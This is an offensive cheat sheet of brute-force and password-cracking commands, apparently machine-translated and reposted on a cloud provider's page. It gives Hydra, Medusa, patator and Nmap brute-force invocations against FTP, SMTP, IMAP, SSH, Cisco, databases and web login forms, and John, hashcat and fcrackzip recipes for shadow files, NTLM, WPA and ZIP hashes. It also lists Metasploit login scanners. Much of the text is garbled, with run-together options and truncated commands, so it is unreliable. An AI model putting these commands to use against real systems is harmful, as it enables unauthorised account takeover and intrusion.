Brute Force hack

Source: Internet
Author: User
Tags imap informix snmp rsync

Smb:

enum-d-u administrator-f passwords.txt server name

FTP:  

Medusa-h ip.txt-u user.txt-p passwd.txt-m FTP

Hydra-l User name - p password dictionary - e ns-vv IP FTP

Hydra

Crack http-proxy:# Hydra-L admin-p pass.txt http-proxy://10.36.16.18cracked imap:# Hydra-L USER.TXT-P Secret10.36.16.18IMAP plain# Hydra-C Defaults.txt-6Imap://[Fe80::2c:31ff:fe12:ac11]:143/plaincracked cisco:# Hydra-P Pass.txt10.36.16.18cisco# Hydra-M Cloud-p pass.txt10.36.16.18cisco-enable crack https:# Hydra-m/index.php-l muts-p Pass.txt10.36.16.18https hack teamspeak:# Hydra-l User name-p password Dictionary-s port number-VV IP teamspeak
Web Form login hack get way submit, Hack Web login: # Hydra-l User name-p password Dictionary-t thread-vv-e NS IP http-Get/admin/# Hydra-l User name-p password Dictionary-t thread-vv-e ns-f IP http-Get/admin/Index.phppost Way to submit, Hack Web login (no verification code supported) Hydra-L admin-p Pass.lst-o ok.lst-t1-F IP http-post-form"/index.php:name=^user^&pwd=^pass^:<title>invalido</title>"Description: Username is admin, password dictionary is pass.lst, the cracked result is saved in Ok.lst,-T is the number of simultaneous threads is 1,-F is when a password is cracked to stop, IP is the destination IP
Http-post-form means the hack is a form password hack submitted using the Post form of HTTP.
The following parameter is the Name property of the corresponding form field in the Web page, and the following <title> is the return information hint that represents the error guess, which can be customized

Enumerate sequence attacks against OpenSSH users

Note: Enumeration of timing attacks ("enumeration Timing Attack") is a side channel attack/bypass Attack (Side channel Attack),
Side channel attack refers to the use of information outside the channel, such as the speed of encryption/decryption of the chip pin voltage/ ciphertext transmission of the traffic and channels, such as the way to attack, a word is described as "beat the bush." –
Osueta is a python2 script for timing attacks against OpenSSH, which can enumerate OpenSSH user names using time series attacks and, under certain conditions, DOS attacks on OpenSSH servers. # https://github.com/c0r3dump3d/osueta$./osueta.py-h 192.168.1.6-p 22-u root-d-v yes$./osueta.py-h 192.168. 10.22-p 22-d 15-v yes–dos no-l userfile.txt

Crack

Nmap-p 873--script rsync-brute--script-args ' rsync-brute.module=www ' 192.168.1.4 hack rsync
Nmap--script informix-brute-p 9088 192.168.1.4 informix database hack
Nmap-p 5432--script pgsql-brute 192.168.1.4 pgsql hack
Nmap-su--script snmp-brute 192.168.1.4 SNMP hack
NMAP-SV--script=telnet-brute 192.168.1.4 telnet hack

Enumerating Samba
Nmblookup-a Target
Smbclient//mount/share-i Target-n
Rpcclient-u "" Target
Enum4linux Target

Enumerate SNMP
Snmpget-v 1-c Public IP
Snmpwalk-v 1-c Public IP
Snmpbulkwalk-v2c-c Public-cn0-cr10 IP

# SMTP Burst (patator)

$ patator smtp_login host=192.168.1.129 user=ololena password=file0 0=/usr/share/john/password.lst $ patator Smtp_login host=192.168.1.129 user=FILE1 password=file0 0=/usr/share/john/password.lst 1=/usr/share/john/ usernames.lst $ patator smtp_login host=192.168.1.129 helo= ' ehlo 192.168.17.128 ' user=file1 password=file0 0=/usr/ Share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.1.129 user=Ololena PASSWORD=FILE0 0=/usr/share/john/password.lst x ignore:fgrep= ' incorrect password or account name '   

MD5 hack ( example : md5.txt file , MD5 hash without salt )

John-format=raw-md5-pot=./wordlist.pot Md5.txt

John-format=raw-md5-opencl-wordlist=wordlist.lst-rules:single md5.txt ( using GPU to speed up cracking )

Hash hack

Hashcat-m 400-a 0 Hash/root/rockyou.txt cracked Hash

Hack linux passwords

" /etc/shadow "  "/etc/shadow"-i:digits-user:test1 user1 #遍历模式,      All possible scenarios for using combination passwords
Parameters: All (0 to 8 characters long) Alpha (all combinations of letters 1 to 8 characters long) Digits (all combinations of numbers 1 to 8 characters long) Alnum (1 to 8 characters long all letters /-Show Hashes --restore hashes on the original basis to continue to crack (crack results appear question mark)

ZIP password hack:

(1) fcrackzip blasting:  4-41(wherein,-B blasting,-l description Password length,-u is a file,-V is verbose output,- c is the password dictionary type)

Oclhashcat

Whether it's a md5,mssql,sha1 or another hash, the cracked command is a,-m set Hash type

cracked WPAv2 Hash cudahashcat 2500  out . Hccap cracked NTLM hash cudahashcat  +

Some blasting modules in the Metasploit

Auxiliary/scanner/mssql/mssql_loginauxiliary/scanner/ftp/ftp_loginauxiliary/scanner /ssh/ssh_loginauxiliary/scanner/telnet/telnet_loginauxiliary/scanner/smb/smb_ Loginauxiliary/scanner/mssql/mssql_loginauxiliary/scanner/mysql/mysql_loginauxiliary/ scanner/oracle/oracle_loginauxiliary/scanner/postgres/postgres_loginauxiliary/scanner/vnc/ vnc_loginauxiliary/scanner/pcanywhere/pcanywhere_loginauxiliary/scanner/snmp/snmp_login

Brute Force hack

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.